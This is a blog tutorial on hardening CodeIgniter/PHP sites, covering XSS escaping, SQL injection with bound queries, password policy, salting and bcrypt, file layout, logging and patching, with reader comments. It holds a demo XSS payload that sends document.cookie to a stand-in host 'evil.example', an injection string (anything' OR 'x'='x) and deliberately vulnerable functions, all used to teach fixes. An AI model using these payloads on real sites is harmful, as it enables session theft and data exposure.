
Cross Site Scripting – XSS
Cross Site Scripting (XSS) is the injection of JavaScript or other markup into the pages your site serves, usually by getting user-supplied input echoed back into the HTML without escaping. The injected script runs in the victim's browser, where it can read the user's cookies, send them to the attacker and so hijack the session. CodeIgniter ships an XSS filter that you can run input through by passing TRUE as the second parameter of the input functions:
$this->input->post('post_field', TRUE); // The second parameter turns the XSS Filter on
The filter is a sanitiser that strips known-dangerous constructs from input; it is not a substitute for escaping data when you output it. Always escape with htmlspecialchars() (ENT_QUOTES, UTF-8) in the context where the value is rendered, and treat the filter as a second layer.
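To make the difference between filtering input and escaping output concrete, here is an added example (it is not code from the original post or from CodeIgniter) that renders the same attacker-supplied comment both ways. It is plain PHP so it runs stand-alone from the CLI; the $comment payload is constructed for the demonstration.

```php
<?php
// Added example: the same user-supplied comment rendered unsafely and safely.
// $comment is a constructed payload of the kind a "comment" field might receive.
$comment = '<script>document.location="http://evil.example/?c="+document.cookie</script>';

// VULNERABLE: the raw input is pasted into the HTML the browser will parse,
// so the <script> element is executed in the viewer's session.
function render_unsafe($text) {
    return '<p class="comment">' . $text . '</p>';
}

// HARDENED: escape for the HTML text context at output time. ENT_QUOTES also
// escapes ' and ", so the same helper is safe inside quoted attribute values.
function e($text) {
    return htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
}

function render_safe($text) {
    return '<p class="comment">' . e($text) . '</p>';
}

echo render_unsafe($comment), "\n";
echo render_safe($comment), "\n";
```

The first line printed contains the script tag intact; the second has its angle brackets and quotes replaced by entities, so the browser shows the text and runs nothing. In a CodeIgniter application the escaping belongs in the view, and $this->input->post('comment', TRUE) on the way in is an additional layer rather than the primary defence.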
SQL Injection
Everyone has heard of SQL Injection. When a string from a form is dropped straight into a query, a normal value is harmless, but suppose a user enters anything' OR 'x'='x. Still look harmless? Put it into context: the first quote closes the string the developer intended, and the OR 'x'='x' makes the WHERE clause true for every row, so the query the database actually executes becomes:
$this->db->query("SELECT * FROM `users` WHERE `id` = 'anything' OR 'x'='x"); // returns every row in users
The fix is never to concatenate user data into SQL: use query bindings (? placeholders with an array of values), Active Record, or $this->db->escape(), so that the quote is sent as data rather than as SQL syntax, and cast numeric IDs with (int) before use.
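The following added example (not from the original post) shows the injection succeeding against a concatenated query and failing against a bound one. It uses an in-memory SQLite database through PDO so it runs stand-alone with the PHP CLI; the table rows and the attacker's input are constructed, and the CodeIgniter equivalents are listed in the comments at the end.

```php
<?php
// Added example: concatenated query vs. bound parameter, on constructed data.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id TEXT, name TEXT)");
$db->exec("INSERT INTO users VALUES ('u1', 'alice'), ('u2', 'bob')");

// The input from the post: closes the string, then ORs in a tautology.
$attacker = "anything' OR 'x'='x";

// VULNERABLE: the value becomes part of the SQL text.
function lookup_unsafe(PDO $db, $id) {
    $sql = "SELECT * FROM users WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// FIXED: the value is bound to a placeholder and never parsed as SQL.
function lookup_safe(PDO $db, $id) {
    $stmt = $db->prepare("SELECT * FROM users WHERE id = ?");
    $stmt->execute(array($id));
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

printf("unsafe: %d rows\n", count(lookup_unsafe($db, $attacker)));
printf("safe:   %d rows\n", count(lookup_safe($db, $attacker)));

// CodeIgniter equivalents of lookup_safe, inside a controller or model with the
// database library loaded:
//   $this->db->query("SELECT * FROM `users` WHERE `id` = ?", array($id));
//   $this->db->where('id', $id)->get('users');
//   "SELECT * FROM `users` WHERE `id` = " . $this->db->escape($id);  // escape() adds the quotes
```

The unsafe lookup returns both constructed rows; the safe one returns none, because no user has the literal id "anything' OR 'x'='x". One caveat for CodeIgniter: its bindings and escape() quote values client-side rather than using server-side prepared statements, so make sure the connection charset in database.php (char_set) matches the tables, otherwise multibyte sequences can defeat the escaping.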
Use Strong Password Policies
Most programmers already use the Form Validation Library for their forms; the good technique is to define a password policy and enforce it with that library on the server, rather than trusting the browser. If you use a ready-made authentication library, check whether it already enforces one. Keep the policy usable: length is what makes a password hard to guess, so favour a long minimum (and a check against known-breached passwords) over elaborate composition rules that push users towards passwords they will never remember or will write down.
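As an added example (not from the original post), here is a CodeIgniter 2-style controller method that enforces such a policy with the Form Validation Library. The controller, view and field names are hypothetical, and the short blocklist of common passwords is constructed for illustration; a real deployment would check against a full breached-password list such as Pwned Passwords.

```php
<?php
// Added example: server-side password policy with CodeIgniter's Form Validation.
class Account extends CI_Controller {

    public function register() {
        $this->load->library('form_validation');

        // Length is the rule that matters; the callback adds the checks the
        // built-in rules cannot express.
        $this->form_validation->set_rules('username', 'Username',
            'required|min_length[3]|max_length[32]');
        $this->form_validation->set_rules('password', 'Password',
            'required|min_length[12]|max_length[128]|callback__password_check');
        $this->form_validation->set_rules('password_confirm', 'Password confirmation',
            'required|matches[password]');

        if ($this->form_validation->run() === FALSE) {
            // Errors are available to the view through validation_errors().
            $this->load->view('register_form');
            return;
        }
        // Validation passed: hash the password and create the account here.
    }

    // Callback: reject a password equal to the username or on the blocklist.
    // The leading underscore keeps the method out of the URL routing.
    public function _password_check($password) {
        $blocklist = array('password', '123456', 'qwerty', 'letmein', 'iloveyou'); // constructed sample
        $username  = (string) $this->input->post('username');

        if ($username !== '' && strcasecmp($password, $username) === 0) {
            $this->form_validation->set_message('_password_check', 'The password must not be your username.');
            return FALSE;
        }
        if (in_array(strtolower($password), $blocklist, TRUE)) {
            $this->form_validation->set_message('_password_check', 'That password is too common; choose another.');
            return FALSE;
        }
        return TRUE;
    }
}
```

The max_length rule is there for a reason: some hash functions (bcrypt, for one) silently truncate long inputs, and an unbounded field is also an easy way to make the server burn CPU on hashing.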
Use Static Salts
When saving user passwords, never store them in clear text and never hash them bare: add a salt before hashing. A salt is a string added to the password before it is hashed, so that an attacker who gets hold of your database cannot use a precomputed lookup (rainbow) table to turn hashes back into passwords. What this post calls a static salt is a single secret shared by all users (often called a pepper); it only helps if it is kept in code or config and not in the database. Be aware, too, that md5 and sha1 are fast general-purpose hashes: a salt defeats lookup tables but does nothing against brute-force guessing, so prefer a slow password hash (bcrypt through PHP's password_hash(), or PBKDF2) wherever your PHP version allows.
$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess'; // application-wide secret; keep it out of the database
$password = '1234';
$hash = sha1($static_salt . $password); // sha1 is fast; see the note above about slow password hashes
Don't feel limited to adding the salt at the start or end of the password; you can interleave it. Where the salt goes adds little security, though. What matters is that it is applied in exactly the same way when the user registers and every time the user tries to log in, otherwise the hashes will never match.
Use Dynamic Salts
You can use a dynamic salt as well. A dynamic salt works like a static salt, but it is generated randomly for each user and stored in the database alongside the other user credentials, so that two users with the same password still get different hashes. It must come from a cryptographic random source (random_bytes() in PHP 7, openssl_random_pseudo_bytes() before that), not rand(), which is predictable and yields only a small range of values. See this example.
$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess';
$dynamic_salt = bin2hex(random_bytes(16)); // 128-bit per-user salt from a CSPRNG (PHP 7+); the original used rand()
$password = '1234';
$hash = sha1($static_salt . $password . $dynamic_salt);
// Store $hash and $dynamic_salt in the user's row; at login, recompute the hash the same way and compare.
Encrypt Passwords
Hashing passwords is the right foundation: a hash cannot be reversed, so even you cannot recover the original password. Some developers go a step further and encrypt the salted hash before storing it. That adds security only if the encryption key lives somewhere the database does not (in config, not in a table), and it is then doing the same job as the static salt: an attacker who steals only the database cannot check guesses. CodeIgniter provides an Encryption library for this. Before anything else you need to set an encryption key: open application/config/config.php and find the line:-
$config['encryption_key'] = "YOUR KEY";
Place your own key there. The user guide recommends a random 32-character key; a longer key does not produce "better" encryption, while a guessable one breaks the whole scheme, so generate it from a random source rather than typing a phrase, and keep config.php out of backups and repositories that travel with the database. Once that is done we can load the library and encrypt the two-salt hash like this.
$this->load->library('encrypt');
$static_salt = 'somereallylongstaticsaltthatnobodyshouldbeabletoguess';
$dynamic_salt = bin2hex(random_bytes(16)); // CSPRNG, PHP 7+; store it beside the ciphertext
$password = '1234';
$hash = sha1($static_salt . $password . $dynamic_salt);
$stored = $this->encrypt->encode($hash); // encode() returns the ciphertext; the original discarded the return value
// At login, recompute $hash with the user's stored $dynamic_salt and compare it with
// $this->encrypt->decode($stored): encode() adds random noise, so compare after decoding, not by re-encoding.
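The three password sections above (static salt, dynamic salt, encrypting the result) all aim at the same outcome: a stolen database should not be enough to recover or check passwords. Here is an added, stand-alone PHP 7 version of that idea that is not code from the original post: bcrypt via password_hash() supplies the per-user random salt and a tunable work factor, and the application-wide secret (PEPPER, the post's "static salt") is bound in with HMAC before hashing. The PEPPER value and the sample passwords are constructed for the demonstration; in a real deployment the secret lives in config and never in the database.

```php
<?php
// Added example: pepper + bcrypt instead of sha1(static . password . dynamic).
const PEPPER = 'replace-with-32-random-bytes-from-a-csprng'; // constructed placeholder

// Pre-hash with HMAC so the pepper is bound in and the bcrypt input is a fixed
// length string without NUL bytes (bcrypt only looks at the first 72 bytes;
// a hex HMAC-SHA256 is 64 characters, so nothing is truncated).
function prehash($password) {
    return hash_hmac('sha256', $password, PEPPER);
}

// Cost 12 = 2^12 rounds; raise it as hardware gets faster.
const BCRYPT_COST = 12;

function create_hash($password) {
    // password_hash() draws a 128-bit random salt and stores it in the result,
    // so there is no separate per-user salt column to manage.
    return password_hash(prehash($password), PASSWORD_BCRYPT, array('cost' => BCRYPT_COST));
}

function verify($password, $stored) {
    return password_verify(prehash($password), $stored);
}

// Call this after a successful login to upgrade hashes made with an older cost.
function needs_upgrade($stored) {
    return password_needs_rehash($stored, PASSWORD_BCRYPT, array('cost' => BCRYPT_COST));
}

// Usage with constructed values.
$stored = create_hash('correct horse battery staple');
var_dump(verify('correct horse battery staple', $stored));
var_dump(verify('1234', $stored));
var_dump(create_hash('1234') === create_hash('1234'));
```

The first verify call returns true and the second false; the last comparison is false because each create_hash() call draws a fresh salt, which is exactly the property the dynamic-salt section is after. Nothing here needs to be encrypted afterwards: the pepper already gives the "database alone is not enough" guarantee, and password_verify() does the comparison in constant time.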
Change Frameworks Default File Structure
It is a good approach to change the framework's default file layout. For CodeIgniter, move the application directory out of the system directory and move the system directory above the web root, then point the path variables at the top of index.php at the new locations. The benefit is not only that the layout is no longer the one an attacker expects; it is that framework and application files (including config.php, which holds your database credentials and encryption key) can no longer be requested directly through the web server. It is not difficult for a hacker to fingerprint the software you use and try known exploits against it, so make that harder. Whatever you run, WordPress included, find out how to harden it and do it immediately.
Log all errors
Some developers will tell you to display no errors in production, and they are right: error output leaks file paths, queries and library versions to whoever triggered the error. But some people take this too far and don't log any errors their PHP application produces either. You should still log every error, with a timestamp, to a file in a directory above the web root that only the web server user can read. Logging in CodeIgniter is simple but not automatic: the default log_threshold in config.php is 0, which disables logging, so set it to 1 (errors only) or higher and make the log directory writable. You can then turn off error display and CodeIgniter will still write errors to the log file. Keep passwords and session tokens out of what you log.
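As an added example (not from the original post), the relevant production settings side by side: CodeIgniter's own log configuration in application/config/config.php, the matching PHP directives, and a call to log_message() from application code. The paths are hypothetical; adjust them to your host.

```php
<?php
// Added example: production logging settings for a CodeIgniter application.

// application/config/config.php
// log_threshold: 0 = logging off (the default), 1 = errors only (including PHP
// errors), 2 = adds debug messages, 3 = adds informational, 4 = everything.
$config['log_threshold']   = 1;
$config['log_path']        = '/var/log/myapp/'; // hypothetical; outside the web root, writable by the web server user only
$config['log_date_format'] = 'Y-m-d H:i:s';

// php.ini (or php_admin_value lines in the vhost), shown here as comments:
//   display_errors = Off
//   log_errors     = On
//   error_log      = /var/log/myapp/php_errors.log
//   expose_php     = Off

// In a controller or model: record events the framework cannot know about.
// Log the account and source address, never the password that was tried.
log_message('error', 'Login failed for user ' . $username . ' from ' . $this->input->ip_address());
```

With log_threshold at 1, the log file receives only errors; raise it temporarily when debugging, then put it back, because the debug and info levels are chatty and can themselves include request data you would rather not keep on disk.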
Update your Applications
If you run WordPress, you will have had stretches where there was a new version to upgrade to nearly every week. Many users grumble at upgrading yet again, but in the grand scheme of things this is what keeps your website as secure as possible: attackers routinely go after flaws that were fixed in a release the victim never applied. I always update my CodeIgniter installs to the newest version as soon as I can, and the same goes for any plugins and third-party libraries you pull in. This keeps the window in which a known flaw is exploitable on your site as short as possible.
Update PHP
PHP is continually updated and patched to keep it as secure as possible. Always run a supported, current stable release: once a branch reaches end of life it receives no security fixes at all, so any bug found in it stays exploitable on your server for as long as you keep running it.
Blind prying eyes
If you use Apache, every default 404 (or any other error page) carries a server signature that tells the visitor exactly which versions of Apache, PHP and any patches you run, which is precisely what an attacker needs to pick an exploit. This is what the default looks like. (No, this isn't my setup!)
Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny3 with Suhosin-Patch Server at demo
Turn it off with ServerSignature Off and ServerTokens Prod in the Apache configuration, and set expose_php = Off in php.ini so PHP stops adding its X-Powered-By header. Hiding the version fixes nothing by itself (keep patching), but it stops handing the information out for free.
Have your code reviewed
It is a good approach to have your code reviewed, ideally by someone else and with security in mind: a second pair of eyes finds the unescaped output or the concatenated query that you stopped seeing. It will also help you find a better way around some common problems you may be running into. It helps with all aspects of programming, not just security.
6 Responses
Very Useful. Thanks for this
Excellent Post for every developer
Very nice post. Really helpful for developers
Nice overview, although it's only a small part of what a developer should prevent (i.e. file inclusion, directory traversal, directory listing and many other things should be prevented..).
There are online and offline scanners which try to detect those security issues automatically.
The only online (free) scanner I know about is Web Scan Service from german-websecurity.
Offline scanners I know about are Acunetix, WebInspect.
John, in my next post I will post the advanced tips about website security.